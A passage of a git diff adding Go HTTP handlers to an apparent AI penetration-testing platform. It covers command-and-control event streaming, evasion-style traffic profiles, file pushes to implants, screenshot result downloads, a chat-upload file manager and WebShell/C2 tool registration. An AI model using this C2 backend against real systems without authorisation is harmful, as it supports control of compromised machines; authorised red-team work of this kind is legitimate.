c.Query("page_size") != "" { + paginated = true + if p, err := strconv.Atoi(c.DefaultQuery("page", "1")); err == nil && p > 0 { + page = p + } + if ps, err := strconv.Atoi(c.DefaultQuery("page_size", "10")); err == nil && ps > 0 { + pageSize = ps + if pageSize > 100 { + pageSize = 100 + } + } + filter.Limit = pageSize + filter.Offset = (page - 1) * pageSize + } else { + if limit := c.Query("limit"); limit != "" { + if n, err := strconv.Atoi(limit); err == nil && n > 0 { + filter.Limit = n + } + } + } + + events, err := h.mgr().DB().ListC2Events(filter) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + if !paginated { + c.JSON(http.StatusOK, gin.H{"events": events}) + return + } + total, err := h.mgr().DB().CountC2Events(filter) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + c.JSON(http.StatusOK, gin.H{ + "events": events, + "total": total, + "page": page, + "page_size": pageSize, + }) +} + +// DeleteEvents 批量删除事件(请求体 JSON: {"ids":["e_xxx",...]}) +func (h *C2Handler) DeleteEvents(c *gin.Context) { + var req struct { + IDs []string `json:"ids"` + } + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": "invalid json: " + err.Error()}) + return + } + if len(req.IDs) == 0 { + c.JSON(http.StatusBadRequest, gin.H{"error": "ids is required"}) + return + } + n, err := h.mgr().DB().DeleteC2EventsByIDs(req.IDs) + if err != nil { + if errors.Is(err, database.ErrNoValidC2EventIDs) { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + c.JSON(http.StatusOK, gin.H{"deleted": n}) +} + +// EventStream SSE 实时事件流 +func (h *C2Handler) EventStream(c *gin.Context) { + c.Header("Content-Type", "text/event-stream") + c.Header("Cache-Control", "no-cache") + c.Header("Connection", "keep-alive") + + sessionFilter := c.Query("session_id") + categoryFilter := c.Query("category") + levels := c.QueryArray("level") + + sub := h.mgr().EventBus().Subscribe( + "sse-"+uuid.New().String(), + 128, + sessionFilter, + categoryFilter, + levels, + ) + defer h.mgr().EventBus().Unsubscribe(sub.ID) + + c.Stream(func(w io.Writer) bool { + select { + case e, ok := <-sub.Ch: + if !ok { + return false + } + data, _ := json.Marshal(e) + fmt.Fprintf(w, "data: %s\n\n", data) + return true + case <-c.Request.Context().Done(): + return false + } + }) +} + +// ============================================================================ +// Profile API +// ============================================================================ + +// ListProfiles 获取 Malleable Profile 列表 +func (h *C2Handler) ListProfiles(c *gin.Context) { + profiles, err := h.mgr().DB().ListC2Profiles() + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + c.JSON(http.StatusOK, gin.H{"profiles": profiles}) +} + +// GetProfile 获取单个 Profile +func (h *C2Handler) GetProfile(c *gin.Context) { + id := c.Param("id") + profile, err := h.mgr().DB().GetC2Profile(id) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + if profile == nil { + c.JSON(http.StatusNotFound, gin.H{"error": "profile not found"}) + return + } + c.JSON(http.StatusOK, gin.H{"profile": profile}) +} + +// CreateProfile 创建 Profile +func (h *C2Handler) CreateProfile(c *gin.Context) { + var req database.C2Profile + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + + req.ID = "p_" + strings.ReplaceAll(uuid.New().String(), "-", "")[:14] + req.CreatedAt = time.Now() + + if err := h.mgr().DB().CreateC2Profile(&req); err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + c.JSON(http.StatusOK, gin.H{"profile": req}) +} + +// UpdateProfile 更新 Profile +func (h *C2Handler) UpdateProfile(c *gin.Context) { + id := c.Param("id") + profile, err := h.mgr().DB().GetC2Profile(id) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + if profile == nil { + c.JSON(http.StatusNotFound, gin.H{"error": "profile not found"}) + return + } + + var req database.C2Profile + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + + profile.Name = req.Name + profile.UserAgent = req.UserAgent + profile.URIs = req.URIs + profile.RequestHeaders = req.RequestHeaders + profile.ResponseHeaders = req.ResponseHeaders + profile.BodyTemplate = req.BodyTemplate + profile.JitterMinMS = req.JitterMinMS + profile.JitterMaxMS = req.JitterMaxMS + + if err := h.mgr().DB().UpdateC2Profile(profile); err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + c.JSON(http.StatusOK, gin.H{"profile": profile}) +} + +// DeleteProfile 删除 Profile +func (h *C2Handler) DeleteProfile(c *gin.Context) { + id := c.Param("id") + if err := h.mgr().DB().DeleteC2Profile(id); err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + c.JSON(http.StatusOK, gin.H{"deleted": true}) +} + +// ============================================================================ +// 文件管理 API(C2 Upload 任务需要先通过此 API 上传文件到 downstream 目录) +// ============================================================================ + +// UploadFileForImplant 操作员上传文件,供 upload 任务推送给 implant +func (h *C2Handler) UploadFileForImplant(c *gin.Context) { + sessionID := strings.TrimSpace(c.PostForm("session_id")) + remotePath := strings.TrimSpace(c.PostForm("remote_path")) + if sessionID == "" || remotePath == "" { + c.JSON(http.StatusBadRequest, gin.H{"error": "session_id and remote_path required"}) + return + } + + file, header, err := c.Request.FormFile("file") + if err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": "file field required: " + err.Error()}) + return + } + defer file.Close() + + fileID := "f_" + strings.ReplaceAll(uuid.New().String(), "-", "")[:14] + dir := filepath.Join(h.mgr().StorageDir(), "downstream") + if err := osMkdirAll(dir); err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + dstPath := filepath.Join(dir, fileID+".bin") + dst, err := osCreate(dstPath) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + n, err := io.Copy(dst, file) + dst.Close() + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + + // Record in DB + dbFile := &database.C2File{ + ID: fileID, + SessionID: sessionID, + Direction: "upload", + RemotePath: remotePath, + LocalPath: dstPath, + SizeBytes: n, + CreatedAt: time.Now(), + } + _ = h.mgr().DB().CreateC2File(dbFile) + + c.JSON(http.StatusOK, gin.H{ + "file_id": fileID, + "size": n, + "filename": header.Filename, + "remote_path": remotePath, + }) +} + +// ListFiles 列出某会话的文件记录 +func (h *C2Handler) ListFiles(c *gin.Context) { + sessionID := c.Query("session_id") + if sessionID == "" { + c.JSON(http.StatusBadRequest, gin.H{"error": "session_id required"}) + return + } + files, err := h.mgr().DB().ListC2FilesBySession(sessionID) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + c.JSON(http.StatusOK, gin.H{"files": files}) +} + +// DownloadResultFile 下载任务结果文件(截图等 blob 结果) +func (h *C2Handler) DownloadResultFile(c *gin.Context) { + taskID := c.Param("id") + task, err := h.mgr().DB().GetC2Task(taskID) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + if task == nil { + c.JSON(http.StatusNotFound, gin.H{"error": "task not found"}) + return + } + if task.ResultBlobPath == "" { + c.JSON(http.StatusNotFound, gin.H{"error": "no result file for this task"}) + return + } + c.FileAttachment(task.ResultBlobPath, filepath.Base(task.ResultBlobPath)) +} + +func osMkdirAll(path string) error { + return os.MkdirAll(path, 0o755) +} + +func osCreate(path string) (*os.File, error) { + return os.Create(path) +} + +// ============================================================================ +// 辅助函数(firstNonEmpty 已在 vulnerability.go 中定义) +// ============================================================================ diff --git a/internal/handler/chat_uploads.go b/internal/handler/chat_uploads.go new file mode 100644 index 00000000..7ca91ebc --- /dev/null +++ b/internal/handler/chat_uploads.go @@ -0,0 +1,528 @@ +package handler + +import ( + "crypto/rand" + "fmt" + "io" + "net/http" + "os" + "path/filepath" + "sort" + "strings" + "time" + "unicode/utf8" + + "cyberstrike-ai/internal/audit" + + "github.com/gin-gonic/gin" + "go.uber.org/zap" +) + +const ( + chatUploadsRootDirName = "chat_uploads" + maxChatUploadEditBytes = 2 * 1024 * 1024 // 文本编辑上限 +) + +// ChatUploadsHandler 对话中上传附件(chat_uploads 目录)的管理 API +type ChatUploadsHandler struct { + logger *zap.Logger + audit *audit.Service +} + +// SetAudit wires platform audit logging. +func (h *ChatUploadsHandler) SetAudit(s *audit.Service) { + h.audit = s +} + +// NewChatUploadsHandler 创建处理器 +func NewChatUploadsHandler(logger *zap.Logger) *ChatUploadsHandler { + return &ChatUploadsHandler{logger: logger} +} + +func (h *ChatUploadsHandler) absRoot() (string, error) { + cwd, err := os.Getwd() + if err != nil { + return "", err + } + return filepath.Abs(filepath.Join(cwd, chatUploadsRootDirName)) +} + +// resolveUnderChatUploads 校验 relativePath(使用 / 分隔)对应文件必须在 chat_uploads 根下 +func (h *ChatUploadsHandler) resolveUnderChatUploads(relativePath string) (abs string, err error) { + root, err := h.absRoot() + if err != nil { + return "", err + } + rel := strings.TrimSpace(relativePath) + if rel == "" { + return "", fmt.Errorf("empty path") + } + rel = filepath.Clean(filepath.FromSlash(rel)) + if rel == "." || strings.HasPrefix(rel, "..") { + return "", fmt.Errorf("invalid path") + } + full := filepath.Join(root, rel) + full, err = filepath.Abs(full) + if err != nil { + return "", err + } + rootAbs, _ := filepath.Abs(root) + if full != rootAbs && !strings.HasPrefix(full, rootAbs+string(filepath.Separator)) { + return "", fmt.Errorf("path escapes chat_uploads root") + } + return full, nil +} + +// ChatUploadFileItem 列表项 +type ChatUploadFileItem struct { + RelativePath string `json:"relativePath"` + AbsolutePath string `json:"absolutePath"` // 服务器上的绝对路径,便于在对话中引用(与附件落盘路径一致) + Name string `json:"name"` + Size int64 `json:"size"` + ModifiedUnix int64 `json:"modifiedUnix"` + Date string `json:"date"` + ConversationID string `json:"conversationId"` + // SubPath 为日期、会话目录之下的子路径(不含文件名),如 date/conv/a/b/file 则为 "a/b";无嵌套则为 ""。 + SubPath string `json:"subPath"` +} + +// List GET /api/chat-uploads +func (h *ChatUploadsHandler) List(c *gin.Context) { + conversationFilter := strings.TrimSpace(c.Query("conversation")) + root, err := h.absRoot() + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + // 保证根目录存在,否则「按文件夹」浏览时无法 mkdir,且首次列表为空时界面无路径工具栏 + if err := os.MkdirAll(root, 0755); err != nil { + h.logger.Warn("创建 chat_uploads 根目录失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + var files []ChatUploadFileItem + var folders []string + err = filepath.WalkDir(root, func(path string, d os.DirEntry, walkErr error) error { + if walkErr != nil { + return walkErr + } + rel, err := filepath.Rel(root, path) + if err != nil { + return err + } + if rel == "." { + return nil + } + relSlash := filepath.ToSlash(rel) + if d.IsDir() { + folders = append(folders, relSlash) + return nil + } + info, err := d.Info() + if err != nil { + return err + } + parts := strings.Split(relSlash, "/") + var dateStr, convID string + if len(parts) >= 2 { + dateStr = parts[0] + } + if len(parts) >= 3 { + convID = parts[1] + } + var subPath string + if len(parts) >= 4 { + subPath = strings.Join(parts[2:len(parts)-1], "/") + } + if conversationFilter != "" && convID != conversationFilter { + return nil + } + absPath, _ := filepath.Abs(path) + files = append(files, ChatUploadFileItem{ + RelativePath: relSlash, + AbsolutePath: absPath, + Name: d.Name(), + Size: info.Size(), + ModifiedUnix: info.ModTime().Unix(), + Date: dateStr, + ConversationID: convID, + SubPath: subPath, + }) + return nil + }) + if err != nil { + h.logger.Warn("列举对话附件失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + if conversationFilter != "" { + filteredFolders := make([]string, 0, len(folders)) + for _, rel := range folders { + parts := strings.Split(rel, "/") + if len(parts) >= 2 && parts[1] == conversationFilter { + filteredFolders = append(filteredFolders, rel) + continue + } + if len(parts) == 1 { + prefix := rel + "/" + for _, f := range files { + if strings.HasPrefix(f.RelativePath, prefix) { + filteredFolders = append(filteredFolders, rel) + break + } + } + } + } + folders = filteredFolders + } + sort.Strings(folders) + sort.Slice(files, func(i, j int) bool { + return files[i].ModifiedUnix > files[j].ModifiedUnix + }) + c.JSON(http.StatusOK, gin.H{"files": files, "folders": folders}) +} + +// Download GET /api/chat-uploads/download?path=... +func (h *ChatUploadsHandler) Download(c *gin.Context) { + p := c.Query("path") + abs, err := h.resolveUnderChatUploads(p) + if err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + st, err := os.Stat(abs) + if err != nil || st.IsDir() { + c.JSON(http.StatusNotFound, gin.H{"error": "file not found"}) + return + } + c.FileAttachment(abs, filepath.Base(abs)) +} + +type chatUploadPathBody struct { + Path string `json:"path"` +} + +// Delete DELETE /api/chat-uploads +func (h *ChatUploadsHandler) Delete(c *gin.Context) { + var body chatUploadPathBody + if err := c.ShouldBindJSON(&body); err != nil || strings.TrimSpace(body.Path) == "" { + c.JSON(http.StatusBadRequest, gin.H{"error": "invalid body"}) + return + } + abs, err := h.resolveUnderChatUploads(body.Path) + if err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + st, err := os.Stat(abs) + if err != nil { + if os.IsNotExist(err) { + c.JSON(http.StatusNotFound, gin.H{"error": "file not found"}) + return + } + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + if st.IsDir() { + if err := os.RemoveAll(abs); err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + } else { + if err := os.Remove(abs); err != nil { + if os.IsNotExist(err) { + c.JSON(http.StatusNotFound, gin.H{"error": "file not found"}) + return + } + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + } + if h.audit != nil { + h.audit.RecordOK(c, "file", "delete", "删除对话附件", "chat_upload", body.Path, nil) + } + c.JSON(http.StatusOK, gin.H{"ok": true}) +} + +type chatUploadMkdirBody struct { + Parent string `json:"parent"` + Name string `json:"name"` +} + +// Mkdir POST /api/chat-uploads/mkdir — 在 parent 目录下新建子目录(parent 为 chat_uploads 下相对路径,空表示根目录;name 为单段目录名) +func (h *ChatUploadsHandler) Mkdir(c *gin.Context) { + var body chatUploadMkdirBody + if err := c.ShouldBindJSON(&body); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": "invalid body"}) + return + } + name := strings.TrimSpace(body.Name) + if name == "" || strings.ContainsAny(name, `/\`) || name == "." || name == ".." { + c.JSON(http.StatusBadRequest, gin.H{"error": "invalid name"}) + return + } + if utf8.RuneCountInString(name) > 200 { + c.JSON(http.StatusBadRequest, gin.H{"error": "name too long"}) + return + } + + parent := strings.TrimSpace(body.Parent) + parent = filepath.ToSlash(filepath.Clean(filepath.FromSlash(parent))) + parent = strings.Trim(parent, "/") + if parent == "." { + parent = "" + } + + root, err := h.absRoot() + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + + if parent != "" { + absParent, err := h.resolveUnderChatUploads(parent) + if err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + st, err := os.Stat(absParent) + if err != nil || !st.IsDir() { + c.JSON(http.StatusBadRequest, gin.H{"error": "parent not found"}) + return + } + } + + var rel string + if parent == "" { + rel = name + } else { + rel = parent + "/" + name + } + absNew, err := h.resolveUnderChatUploads(rel) + if err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + if _, err := os.Stat(absNew); err == nil { + c.JSON(http.StatusConflict, gin.H{"error": "already exists"}) + return + } + if err := os.Mkdir(absNew, 0755); err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + relOut, _ := filepath.Rel(root, absNew) + c.JSON(http.StatusOK, gin.H{"ok": true, "relativePath": filepath.ToSlash(relOut)}) +} + +type chatUploadRenameBody struct { + Path string `json:"path"` + NewName string `json:"newName"` +} + +// Rename PUT /api/chat-uploads/rename +func (h *ChatUploadsHandler) Rename(c *gin.Context) { + var body chatUploadRenameBody + if err := c.ShouldBindJSON(&body); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": "invalid body"}) + return + } + newName := strings.TrimSpace(body.NewName) + if newName == "" || strings.ContainsAny(newName, `/\`) { + c.JSON(http.StatusBadRequest, gin.H{"error": "invalid newName"}) + return + } + abs, err := h.resolveUnderChatUploads(body.Path) + if err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + dir := filepath.Dir(abs) + newAbs := filepath.Join(dir, filepath.Base(newName)) + root, _ := h.absRoot() + newAbs, _ = filepath.Abs(newAbs) + if newAbs != root && !strings.HasPrefix(newAbs, root+string(filepath.Separator)) { + c.JSON(http.StatusBadRequest, gin.H{"error": "invalid target path"}) + return + } + if err := os.Rename(abs, newAbs); err != nil { + if os.IsNotExist(err) { + c.JSON(http.StatusNotFound, gin.H{"error": "file not found"}) + return + } + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + newRel, _ := filepath.Rel(root, newAbs) + c.JSON(http.StatusOK, gin.H{"ok": true, "relativePath": filepath.ToSlash(newRel)}) +} + +type chatUploadContentBody struct { + Path string `json:"path"` + Content string `json:"content"` +} + +// GetContent GET /api/chat-uploads/content?path=... +func (h *ChatUploadsHandler) GetContent(c *gin.Context) { + p := c.Query("path") + abs, err := h.resolveUnderChatUploads(p) + if err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + st, err := os.Stat(abs) + if err != nil || st.IsDir() { + c.JSON(http.StatusNotFound, gin.H{"error": "file not found"}) + return + } + if st.Size() > maxChatUploadEditBytes { + c.JSON(http.StatusRequestEntityTooLarge, gin.H{"error": "file too large for editor"}) + return + } + b, err := os.ReadFile(abs) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + if !utf8.Valid(b) { + c.JSON(http.StatusBadRequest, gin.H{"error": "binary file not editable in UI"}) + return + } + c.JSON(http.StatusOK, gin.H{"content": string(b)}) +} + +// PutContent PUT /api/chat-uploads/content +func (h *ChatUploadsHandler) PutContent(c *gin.Context) { + var body chatUploadContentBody + if err := c.ShouldBindJSON(&body); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": "invalid body"}) + return + } + if !utf8.ValidString(body.Content) { + c.JSON(http.StatusBadRequest, gin.H{"error": "content must be valid UTF-8"}) + return + } + if len(body.Content) > maxChatUploadEditBytes { + c.JSON(http.StatusRequestEntityTooLarge, gin.H{"error": "content too large"}) + return + } + abs, err := h.resolveUnderChatUploads(body.Path) + if err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + if err := os.WriteFile(abs, []byte(body.Content), 0644); err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + c.JSON(http.StatusOK, gin.H{"ok": true}) +} + +func chatUploadShortRand(n int) string { + const letters = "0123456789abcdef" + b := make([]byte, n) + _, _ = rand.Read(b) + for i := range b { + b[i] = letters[int(b[i])%len(letters)] + } + return string(b) +} + +// Upload POST /api/chat-uploads multipart: file;conversationId 可选;relativeDir 可选(chat_uploads 下目录的相对路径,将文件直接上传至该目录) +func (h *ChatUploadsHandler) Upload(c *gin.Context) { + fh, err := c.FormFile("file") + if err != nil || fh == nil { + c.JSON(http.StatusBadRequest, gin.H{"error": "missing file"}) + return + } + root, err := h.absRoot() + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + + var targetDir string + targetRel := strings.TrimSpace(c.PostForm("relativeDir")) + if targetRel != "" { + absDir, err := h.resolveUnderChatUploads(targetRel) + if err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + st, err := os.Stat(absDir) + if err != nil { + if os.IsNotExist(err) { + if err := os.MkdirAll(absDir, 0755); err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + } else { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + } else if !st.IsDir() { + c.JSON(http.StatusBadRequest, gin.H{"error": "relativeDir is not a directory"}) + return + } + targetDir = absDir + } else { + convID := strings.TrimSpace(c.PostForm("conversationId")) + convDir := convID + if convDir == "" { + convDir = "_manual" + } else { + convDir = strings.ReplaceAll(convDir, string(filepath.Separator), "_") + } + dateStr := time.Now().Format("2006-01-02") + targetDir = filepath.Join(root, dateStr, convDir) + if err := os.MkdirAll(targetDir, 0755); err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + } + baseName := filepath.Base(fh.Filename) + if baseName == "" || baseName == "." { + baseName = "file" + } + baseName = strings.ReplaceAll(baseName, string(filepath.Separator), "_") + ext := filepath.Ext(baseName) + nameNoExt := strings.TrimSuffix(baseName, ext) + suffix := fmt.Sprintf("_%s_%s", time.Now().Format("150405"), chatUploadShortRand(6)) + var unique string + if ext != "" { + unique = nameNoExt + suffix + ext + } else { + unique = baseName + suffix + } + fullPath := filepath.Join(targetDir, unique) + src, err := fh.Open() + if err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + defer src.Close() + dst, err := os.Create(fullPath) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + defer dst.Close() + if _, err := io.Copy(dst, src); err != nil { + _ = os.Remove(fullPath) + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + rel, _ := filepath.Rel(root, fullPath) + absSaved, _ := filepath.Abs(fullPath) + if h.audit != nil { + h.audit.RecordOK(c, "file", "upload", "上传对话附件", "chat_upload", filepath.ToSlash(rel), map[string]interface{}{ + "name": unique, + }) + } + c.JSON(http.StatusOK, gin.H{ + "ok": true, + "relativePath": filepath.ToSlash(rel), + "absolutePath": absSaved, + "name": unique, + }) +} diff --git a/internal/handler/config.go b/internal/handler/config.go new file mode 100644 index 00000000..0073d009 --- /dev/null +++ b/internal/handler/config.go @@ -0,0 +1,2160 @@ +package handler + +import ( + "bytes" + "context" + "fmt" + "net/http" + "os" + "path/filepath" + "sort" + "strconv" + "strings" + "sync" + "time" + + "cyberstrike-ai/internal/agents" + "cyberstrike-ai/internal/audit" + "cyberstrike-ai/internal/config" + "cyberstrike-ai/internal/knowledge" + "cyberstrike-ai/internal/mcp" + "cyberstrike-ai/internal/mcp/builtin" + "cyberstrike-ai/internal/openai" + "cyberstrike-ai/internal/security" + + "github.com/gin-gonic/gin" + "go.uber.org/zap" + "gopkg.in/yaml.v3" +) + +// KnowledgeToolRegistrar 知识库工具注册器接口 +type KnowledgeToolRegistrar func() error + +// VulnerabilityToolRegistrar 漏洞工具注册器接口 +type VulnerabilityToolRegistrar func() error + +// WebshellToolRegistrar WebShell 工具注册器接口(ApplyConfig 时重新注册) +type WebshellToolRegistrar func() error + +// SkillsToolRegistrar Skills工具注册器接口 +type SkillsToolRegistrar func() error + +// BatchTaskToolRegistrar 批量任务 MCP 工具注册器(ApplyConfig 时重新注册) +type BatchTaskToolRegistrar func() error + +// C2ToolRegistrar C2 MCP 工具注册器(ApplyConfig 时 ClearTools 之后调用) +type C2ToolRegistrar func() error + +// C2Runtime ApplyConfig 时按配置启停 C2 子系统(由 internal/app.App 实现) +type C2Runtime interface { + ReconcileC2AfterConfigApply() error +} + +// RetrieverUpdater 检索器更新接口 +type RetrieverUpdater interface { + UpdateConfig(config *knowledge.RetrievalConfig) +} + +// KnowledgeInitializer 知识库初始化器接口 +type KnowledgeInitializer func() (*KnowledgeHandler, error) + +// AppUpdater App更新接口(用于更新App中的知识库组件) +type AppUpdater interface { + UpdateKnowledgeComponents(handler *KnowledgeHandler, manager interface{}, retriever interface{}, indexer interface{}) +} + +// RobotRestarter 机器人连接重启器(用于配置应用后重启钉钉/飞书长连接) +type RobotRestarter interface { + RestartRobotConnections() +} + +// ConfigHandler 配置处理器 +type ConfigHandler struct { + configPath string + config *config.Config + mcpServer *mcp.Server + executor *security.Executor + agent AgentUpdater // Agent接口,用于更新Agent配置 + attackChainHandler AttackChainUpdater // 攻击链处理器接口,用于更新配置 + externalMCPMgr *mcp.ExternalMCPManager // 外部MCP管理器 + knowledgeToolRegistrar KnowledgeToolRegistrar // 知识库工具注册器(可选) + vulnerabilityToolRegistrar VulnerabilityToolRegistrar // 漏洞工具注册器(可选) + webshellToolRegistrar WebshellToolRegistrar // WebShell 工具注册器(可选) + skillsToolRegistrar SkillsToolRegistrar // Skills工具注册器(可选) + batchTaskToolRegistrar BatchTaskToolRegistrar // 批量任务 MCP 工具(可选) + c2ToolRegistrar C2ToolRegistrar // C2 MCP 工具(可选) + c2Runtime C2Runtime // C2 启停(可选) + retrieverUpdater RetrieverUpdater // 检索器更新器(可选) + knowledgeInitializer KnowledgeInitializer // 知识库初始化器(可选) + appUpdater AppUpdater // App更新器(可选) + robotRestarter RobotRestarter // 机器人连接重启器(可选),ApplyConfig 时重启钉钉/飞书 + audit *audit.Service + logger *zap.Logger + mu sync.RWMutex + lastEmbeddingConfig *config.EmbeddingConfig // 上一次的嵌入模型配置(用于检测变更) +} + +// AttackChainUpdater 攻击链处理器更新接口 +type AttackChainUpdater interface { + UpdateConfig(cfg *config.OpenAIConfig) +} + +// AgentUpdater Agent更新接口 +type AgentUpdater interface { + UpdateConfig(cfg *config.OpenAIConfig) + UpdateMaxIterations(maxIterations int) + UpdateToolDescriptionMode(mode string) +} + +// NewConfigHandler 创建新的配置处理器 +func NewConfigHandler(configPath string, cfg *config.Config, mcpServer *mcp.Server, executor *security.Executor, agent AgentUpdater, attackChainHandler AttackChainUpdater, externalMCPMgr *mcp.ExternalMCPManager, logger *zap.Logger) *ConfigHandler { + // 保存初始的嵌入模型配置(如果知识库已启用) + var lastEmbeddingConfig *config.EmbeddingConfig + if cfg.Knowledge.Enabled { + lastEmbeddingConfig = &config.EmbeddingConfig{ + Provider: cfg.Knowledge.Embedding.Provider, + Model: cfg.Knowledge.Embedding.Model, + BaseURL: cfg.Knowledge.Embedding.BaseURL, + APIKey: cfg.Knowledge.Embedding.APIKey, + } + } + return &ConfigHandler{ + configPath: configPath, + config: cfg, + mcpServer: mcpServer, + executor: executor, + agent: agent, + attackChainHandler: attackChainHandler, + externalMCPMgr: externalMCPMgr, + logger: logger, + lastEmbeddingConfig: lastEmbeddingConfig, + } +} + +// SetKnowledgeToolRegistrar 设置知识库工具注册器 +func (h *ConfigHandler) SetKnowledgeToolRegistrar(registrar KnowledgeToolRegistrar) { + h.mu.Lock() + defer h.mu.Unlock() + h.knowledgeToolRegistrar = registrar +} + +// SetVulnerabilityToolRegistrar 设置漏洞工具注册器 +func (h *ConfigHandler) SetVulnerabilityToolRegistrar(registrar VulnerabilityToolRegistrar) { + h.mu.Lock() + defer h.mu.Unlock() + h.vulnerabilityToolRegistrar = registrar +} + +// SetWebshellToolRegistrar 设置 WebShell 工具注册器 +func (h *ConfigHandler) SetWebshellToolRegistrar(registrar WebshellToolRegistrar) { + h.mu.Lock() + defer h.mu.Unlock() + h.webshellToolRegistrar = registrar +} + +// SetSkillsToolRegistrar 设置Skills工具注册器 +func (h *ConfigHandler) SetSkillsToolRegistrar(registrar SkillsToolRegistrar) { + h.mu.Lock() + defer h.mu.Unlock() + h.skillsToolRegistrar = registrar +} + +// SetBatchTaskToolRegistrar 设置批量任务 MCP 工具注册器 +func (h *ConfigHandler) SetBatchTaskToolRegistrar(registrar BatchTaskToolRegistrar) { + h.mu.Lock() + defer h.mu.Unlock() + h.batchTaskToolRegistrar = registrar +} + +// SetC2ToolRegistrar 设置 C2 MCP 工具注册器 +func (h *ConfigHandler) SetC2ToolRegistrar(registrar C2ToolRegistrar) { + h.mu.Lock() + defer h.mu.Unlock() + h.c2ToolRegistrar = registrar +} + +// SetC2Runtime 设置 C2 运行时(Apply 时启停) +func (h *ConfigHandler) SetC2Runtime(rt C2Runtime) { + h.mu.Lock() + defer h.mu.Unlock() + h.c2Runtime = rt +} + +// SetRetrieverUpdater 设置检索器更新器 +func (h *ConfigHandler) SetRetrieverUpdater(updater RetrieverUpdater) { + h.mu.Lock() + defer h.mu.Unlock() + h.retrieverUpdater = updater +} + +// SetKnowledgeInitializer 设置知识库初始化器 +func (h *ConfigHandler) SetKnowledgeInitializer(initializer KnowledgeInitializer) { + h.mu.Lock() + defer h.mu.Unlock() + h.knowledgeInitializer = initializer +} + +// SetAppUpdater 设置App更新器 +func (h *ConfigHandler) SetAppUpdater(updater AppUpdater) { + h.mu.Lock() + defer h.mu.Unlock() + h.appUpdater = updater +} + +// SetRobotRestarter 设置机器人连接重启器(ApplyConfig 时用于重启钉钉/飞书长连接) +func (h *ConfigHandler) SetRobotRestarter(restarter RobotRestarter) { + h.mu.Lock() + defer h.mu.Unlock() + h.robotRestarter = restarter +} + +// SetAudit wires platform audit logging. +func (h *ConfigHandler) SetAudit(s *audit.Service) { + h.mu.Lock() + defer h.mu.Unlock() + h.audit = s +} + +// ApplyWechatRobotBinding 微信 iLink 扫码绑定成功后写入配置并重启机器人连接 +func (h *ConfigHandler) ApplyWechatRobotBinding(wc config.RobotWechatConfig) error { + h.mu.Lock() + wc.Enabled = true + h.config.Robots.Wechat = wc + h.mu.Unlock() + if err := h.saveConfig(); err != nil { + return err + } + if h.robotRestarter != nil { + h.robotRestarter.RestartRobotConnections() + } + h.logger.Info("微信机器人绑定已保存", + zap.String("ilink_bot_id", wc.ILinkBotID), + zap.Bool("enabled", wc.Enabled), + ) + return nil +} + +// GetConfigResponse 获取配置响应 +type GetConfigResponse struct { + OpenAI config.OpenAIConfig `json:"openai"` 